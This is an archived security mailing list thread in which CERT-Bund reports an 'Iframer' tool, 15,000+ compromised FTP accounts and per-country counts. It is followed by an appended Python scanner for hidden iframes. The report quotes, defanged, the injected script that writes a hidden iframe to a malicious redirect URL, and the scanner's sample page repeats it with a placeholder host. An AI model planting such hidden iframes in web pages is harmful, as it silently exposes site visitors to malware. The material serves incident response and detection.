[nsp-sec] ACK Compromised ftp accounts

Zoe O'Connell zoe at hotchilli.com
Tue Aug 25 07:42:13 EDT 2009


ACK AS8419, thanks.

Thomas Hungenberg wrote:
> ----------- nsp-security Confidential --------
>
> The gzip'ed attachment did not make it to the list, so I'm sending the list
> again uncompressed.
>
>
>      - Thomas
>
> CERT-Bund Incident Response & Anti-Malware Team
>
>
> Thomas Hungenberg schrieb:
>   
>> Hi teams,
>>
>> I've come across an Iframer installation along with a list of 15.000+ ftp credentials.
>>
>> The Iframer tool most probably recently tried to inject this line (remove 'XXX'):
>> <scrXXXipt>document.write(\'<ifrXXXame src=\"htXXXtp://sexyy.ru/tds/go.php?sid=1\" width=\"0\" height=\"0\" style=\"display:none;visibility:hidden;\"></ifrXXXame>\');</scrXXXipt>
>>
>> Please find attached a sanitized list (pw removed) of the compromised ftp accounts.
>> Format: ASN | IP | CC | ftp username | AS name
>>
>> Top 10 country codes:
>>
>>    5240  US
>>    1263  RU
>>    1187  DE
>>     882  EU
>>     803  TR
>>     720  CZ
>>     674  FR
>>     655  PL
>>     564  HU
>>     475  NL
>>
>>
>>      - Thomas
>>
>> CERT-Bund Incident Response & Anti-Malware Team
>>
>
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
>
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
> community. Confidentiality is essential for effective Internet security counter-measures.
> _______________________________________________
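
A defender-side check for the injection described in the report above, as an added example that is not part of the original thread: it scans page source for hidden iframes with an external src, tolerating backslash-escaped quotes as in the reported line. The function names, the 0/1 pixel threshold and the sample page (with a placeholder host) are assumptions constructed for illustration.

```python
import re

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
HIDDEN_STYLE_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
EXTERNAL_RE = re.compile(r"(?:https?:)?//", re.I)

# Constructed sample page; the host is a placeholder, not a value from the report.
SAMPLE = r"""<html><body>
<h1>Welcome</h1>
<iframe src="/widgets/map.html" width="400" height="300"></iframe>
<script>document.write(\'<iframe src=\"http://injected.example.invalid/tds/go.php?sid=1\" width=\"0\" height=\"0\" style=\"display:none;visibility:hidden;\"></iframe>\');</script>
</body></html>"""


def parse_attrs(raw):
    """Return tag attributes as a dict with lower-cased names."""
    return {n.lower(): dq or sq or bare for n, dq, sq, bare in ATTR_RE.findall(raw)}


def tiny(value):
    """True for 0 or 1 pixel dimensions, the usual 'invisible frame' sizes."""
    return value.strip().lower().rstrip("px") in ("0", "1")


def find_hidden_iframes(text):
    """Return (line_no, src, reasons) for each hidden iframe with an external src."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        # Injected markup is often stored inside a quoted string, so undo \" and \'.
        norm = line.replace('\\"', '"').replace("\\'", "'")
        for m in IFRAME_RE.finditer(norm):
            attrs = parse_attrs(m.group(1))
            src = attrs.get("src", "")
            reasons = []
            if tiny(attrs.get("width", "")) and tiny(attrs.get("height", "")):
                reasons.append("zero-size")
            if HIDDEN_STYLE_RE.search(attrs.get("style", "")):
                reasons.append("hidden-style")
            if reasons and EXTERNAL_RE.match(src):
                if "document.write" in norm[:m.start()]:
                    reasons.append("document.write")
                findings.append((line_no, src, reasons))
    return findings


if __name__ == "__main__":
    for finding in find_hidden_iframes(SAMPLE):
        print(finding)
```

Run over the files of an FTP-writable web root, a hit on a page that was previously clean is a reason to reset that account's password and review its recent uploads.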




